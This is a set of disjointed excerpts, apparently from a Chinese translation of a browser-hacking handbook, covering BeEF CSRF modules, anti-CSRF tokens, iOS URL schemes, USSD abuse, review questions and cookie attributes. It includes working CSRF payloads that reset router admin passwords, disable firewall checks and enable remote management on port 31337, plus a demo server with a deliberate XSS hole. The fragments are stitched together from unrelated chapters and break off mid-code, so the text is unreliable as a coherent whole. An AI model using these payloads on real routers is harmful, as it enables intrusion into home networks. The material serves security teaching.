'value':'0'}, {'type':'hidden', 'name':'block_cookie', 'value':'0'}, {'type':'hidden', 'name':'block_java', 'value':'0'}, {'type':'hidden', 'name':'block_proxy', 'value':'0'}, {'type':'hidden', 'name':'block_activex', 'value':'0'}, {'type':'hidden', 'name':'wait_time', 'value':'3'}, {'type':'hidden', 'name':'ipv6_filter', 'value':'off'}, {'type':'hidden', 'name':'filter', 'value':'off'} ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, \ "result=exploit attempted"); cleanup = function() { document.body.removeChild(cisco_e2400_iframe1); document.body.removeChild(cisco_e2400_iframe2); } setTimeout("cleanup()", 15000); }); 多数情况下这些代码都可以跨域得到信任。
BeEF的dom.js核心文件的JavaScript API可以用来动态创建HTML表单: createIframeXsrfForm: function(action, method, inputs){ // 宽高都是1像素的不可见的内嵌框架 var iframeXsrf = beef.dom.createInvisibleIframe(); var formXsrf = document.createElement('form'); formXsrf.setAttribute('action', action); formXsrf.setAttribute('method', method); // 添加到表单的输入数组(type, name, value). // 比如 [{'type':'hidden', 'name':'1', 'value':''} // {'type':'hidden', 'name':'2', 'value':'3'}] var input = null; for (i in inputs){ var attributes = inputs[i]; input = document.createElement('input'); for(key in attributes){ input.setAttribute(key, attributes[key]); } formXsrf.appendChild(input); } // 表单附加到了隐藏的IFrame,并提交 iframeXsrf.contentWindow.document.body.appendChild(formXsrf); formXsrf.submit(); return iframeXsrf; } 以上API方法可以让模块方便地创建随时可用的XSRF攻击,而且之后还可以连环实施其他利用。
11 BeEF Project. (2012). CSRF Virgin Superhub . Retrieved October 8, 2013 from https://github.com/beefproject/beef/issues/703 这意味着跨域请求可以在目标设备上执行一些重要的操作。
如果用户经过了认证,以下代码就可以重置管理员密码、禁用防火墙并启用远程管理: var gateway = 'http://192.168.100.1/'; var passwd = 'BeEF12345'; var port = '31337'; // 将默认的路由器密码重置为'BeEF12345' var iframe_1 = beef.dom.createIframeXsrfForm( gateway + "goform/RgSecurity", "POST", [ {'type':'hidden', 'name':'NetgearPassword', 'value':passwd}, {'type':'hidden', 'name':'NetgearPasswordReEnter', 'value':passwd}, {'type':'hidden', 'name':'RestoreFactoryNo', 'value':'0x00'} ]); // 禁用防火墙 var iframe_2 = beef.dom.createIframeXsrfForm( gateway + "goform/RgServices", "POST", [ {'type':'hidden', 'name':'cbPortScanDetection', 'value':''} ]); // 在端口31337启用远程管理 var iframe_3 = beef.dom.createIframeXsrfForm( gateway + "goform/RgVMRemoteManagementRes", "POST", [ {'type':'hidden', 'name':'NetgearVMRmEnable', 'value':'0x01'}, {'type':'hidden', 'name':'NetgearVMRmPortNumber', 'value':port} ]); 如果你通过浏览器攻击路由器,回报会非常丰厚。
9.5.3 使用CSRF token获得保护 如果在浏览器发送给Web应用的请求后面,加上一个伪随机token(防御XSRF的token)作为参数,那么XSRF攻击可能会失败 12 。 下面是一个常规的、存在漏洞的HTML表单: 12 Chris Shiflett. (2004). Cross-Site Request Forgeries . Retrieved June 15, 2013 from http://shiflett.org/articles/cross-site-request-forgeries <form name="addUserToAdmins" action="/adduser" method="POST"> <input type="hidden" name="userId" value"1234"> <input type="hidden" name="isAdmin" value"true"> <input type="submit" value="Add to admin group" \ style="height: 60px; width: 150px; font-size:3em"> </form> 以下是添加了防御XSRF的token的表单: <form name="addUserToAdmins" action="/adduser" method="POST"> <input type="hidden" name="userId" value"1234"> <input type="hidden" name="isAdmin" value"true"> <input type="hidden" name="TOKEN" value"asasdasd86a\ sd876as87623234aksjdhjkashd"> <input type="submit" value="Add to admin group" style="height: 60px; width: 150px; font-size:3em"> </form> 还说前面攻击Cisco E2400的例子。 如果HTML表单通过防御XSRF的token保护起来,攻击就可能失败。
通过XSS绕过防御XSRF的token 防御XSRF的token的作用是降低跨站点请求伪造攻击成功的可能性,但对XSS无效。 如果目标Web应用使用了防御XSRF的token,而你通过勾连控制了目标源,则可以绕过该保护机制。
比如,mailto:模式就会打开电子邮件客户端。 如果HTML页面中有一个链接指向mailto:,那么用户点击它,浏览器就会打开相应的外部应用,以便发送电子邮件。
23 Nitesh Dhanjani. (2010). Insecure Handling of URL Schemes in Apple's iOS . Retrieved July 10, 2013 from http://www.dhanjani.com/blog/2010/11/insecure-handling-of-url-schemes-in-apples-ios.html Dhanjani的研究调查了原生iOS协议处理例程,例如tel:处理程序。
为了允许其他应用利用自定义的URI模式,苹果在其Info.plist说明 24 中包含了 CFBundleURLTypes 数组类型,可以从下面这段代码中看到: 24 Apple. (2010). Information Property List Key Reference : Core Foundation Keys . Retrieved July 10, 2013 from http://developer.apple.com/library/ios/#documentation/general/Reference/InfoPlistKeyReference/Articles/Core-FoundationKeys.html#//apple_ref/doc/uid/TP40009249-SW1 <key>CFBundleURLTypes</key> <array> <dict> <key>CFBundleURLName</key> <string>com.skype.skype</string> <key>CFBundleURLSchemes</key> <array> <string>skype</string> </array> </dict> </array> Skype不仅将这个模式暴露给浏览器,也接受额外的参数。
图 6-24 iOS尝试在Skype中拨打电话 Dhanjani的研究探索了一些分析Info.plist文件的方法,包括从越狱的iOS设备中把它们复制出来,或者通过iTunes从应用备份中提取它们。
在OS X中,这种文件通常位于~/Music/iTunes/iTunes Media/Mobile Applications目录下。 在Windows中,通常位于C:\Users\<user>\MyMusic\iTunes\iTunes Media\Mobile Applications\目录下。
6.4.2 滥用三星Galaxy USSD(Unstructured Supplementary Service Data,非结构化补充服务数据),是GSM蜂窝电话与用户的通信服务商直接通信的一种协议。
当然,USSD还有其他用途,比如手机银行,甚至还可以用于更新Twitter和Facebook。 虽然很多USSD码可以打开与电信服务商的实时连接,但其中很多在手机里都有与之对应的特定操作。
比如,大多数智能手机打开拨号盘后输入 *#06# ,有时候都不必点击拨号键,就可以显示你的IMEI(International Mobile Station Equipment Identity,国际移动识别码)。
25 Ravishankar Borgaonkar. (2013). Dirty use of USSD codes in cellular networks . Retrieved July 10, 2013 from https://www.troopers.de/wp-content/uploads/2012/12/TROOPERS13-Dirty_use_of_USSD_code_in_cellular-Ravi_Borgaonkor.pdf Borgaonkar的研究后来又发现了安卓手机可以接收USSD码并执行的多种方式。
某些情况下,如果不正确地输入SIM码三次,SIM就会锁住,直到输入正确的PUK(PIN Unlocked Key)码。 如果不正确地输入10次PUK码,就会导致SIM卡失效,因此不能再使用。
Unknown 4.5 问题 (1) 什么是同源策略,以及为什么它对浏览器安全如此重要? (2) 为什么攻击者对绕过SOP非常感兴趣? (3) 解释一下怎么使用被勾连的浏览器作为HTTP代理。在绕过SOP和不绕过SOP的情况下,使用它有什么不同? (4) 描述在Java中绕过SOP的一种方案。 (5) 解释一下在Safari中绕过SOP的原理。 (6) 解析一下Adobe Reader SOP绕行技术与XEE漏洞的关系。 (7) 描述一个点击劫持的例子。 (8) 描述一个文件劫持的例子。 (9) 攻击浏览器历史记录的方法是怎样演变的?描述基于缓存计时的一种最新攻击方法。 (10) 为什么分析浏览器API很重要?描述一种对Avant或Maxthon浏览器进行攻击的方法。 要查看问题的答案,请访问本书网站 https://browserhacker.com/answers ,或者Wiley的网站 http://www.wiley.com/go/browserhackershandbook 。
cookie是在浏览器中存储数据的一种简单的机制。 cookie存储的数据有时候非常重要。 因为cookie有很多用途,既可以存储会话标识符——这样当你访问网站时,网站会记住你是谁;
cookie可以在浏览器关闭再打开后仍然有效,也可以随着浏览器窗口关闭而被立即删除。 cookie由Web应用负责维护,保存在浏览器的本地数据库里,相应的数据由Web应用设置和管理。
为了在浏览器中设置cookie,应用需要发送一个Set-Cookie的响应首部,其中包含cookie的内容: cookie的名称 cookie的值 cookie的失效日期 cookie适用的路径 cookie适用的域 其他cookie相关属性 本节就来介绍Set-Cookie请求的这些属性,以便理解后续要介绍的cookie攻击方法。
require 'rubygems' require 'thin' require 'rack' require 'sinatra' require 'json' class CookieDemo < Sinatra::Base get "/" do response.set_cookie "session_cookie", {:value => 'yes', :domain => 'browserhacker.com', :path => '/' , :httponly => true} response.set_cookie "persistent_cookie", {:value => 'yes', :domain => 'browserhacker.com', :path => '/' , :httponly => true , :expires => Time.now + (60 * 60 * 7) } "\n" + request.cookies.to_json + "\n\n" end end @routes = { "/" => CookieDemo.new } @rack_app = Rack::URLMap.new(@routes) @thin = Thin::Server.new("browserhacker.com", 4000, @rack_app) Thin::Logging.silent = true Thin::Logging.debug = false puts "[#{Time.now}] Thin ready" @thin.start 可以通过 curl 来查看发送的cookie,比如: curl -c cookiejar -b cookiejar -v http://browserhacker.com 执行以上代码后,cookie将被保存在cookiejar文件中,以备将来的请求使用。
1. 理解失效时间属性 失效时间对应的属性是 Expires ,它帮助浏览器决定保存cookie的时间。 cookie的生命周期可以长至浏览器多次重启都有效,也可以短至只要浏览器一关闭就结束。 不设置 Expires 属性就可以实现不在磁盘上保存cookie,而一旦浏览器关闭就销毁cookie数据。
对追踪用户而言,会话cookie是理想的选择。 如果应用想在用户每次返回应用时都区分识别他们,那么持久cookie更合适。 持久cookie会设置一下未来的删除cookie的时间。
修改后的代码如下: class CookieDemo < Sinatra::Base get "/" do response.set_cookie "session_cookie", {:value => 'yes', :domain => 'browserhacker.com', :path => '/' } response.set_cookie "persistent_cookie", {:value => 'yes', :domain => 'browserhacker.com', :path => '/', :expires => Time.now + (60 * 60 * 7) } "\n" + request.cookies.to_json + "\n\n" end end 重新加载页面,再次在Firebug控制台中执行 document.cookie ,就会看到响应中包含的cookie了,如图6-13所示。
理想的情况是使用两个cookie:一个会话cookie跟踪用户对所有browserhacker.com域的访问,另一个会话cookie跟踪在browserhacker. com中认证后的用户,将其限制于只能访问/checkout路径。
以下代码在根路径上存在XSS漏洞,即没有恰当处理 test 参数: require 'rubygems' require 'thin' require 'rack' require 'sinatra' require 'json' class CookieDemo < Sinatra::Base get "/" do response.set_cookie "parent_cookie", {:value => 'yes', :domain => 'browserhacker.com', :path => '/' } "Test parameter: " + params['test'] end get "/checkout" do response.set_cookie "checkout_cookie", {:value => 'RESTRAINED TO THIS PATH', :domain => 'browserhacker.com', :path => '/checkout' } end end @routes = { "/" => CookieDemo.new } @rack_app = Rack::URLMap.new(@routes) @thin = Thin::Server.new("browserhacker.com", 4000, @rack_app) Thin::Logging.silent = true Thin::Logging.debug = false puts "[#{Time.now}] Thin ready" @thin.start 假设/checkout路径没有任何XSS漏洞,因此无法通过这个路径盗取checkout_cookie。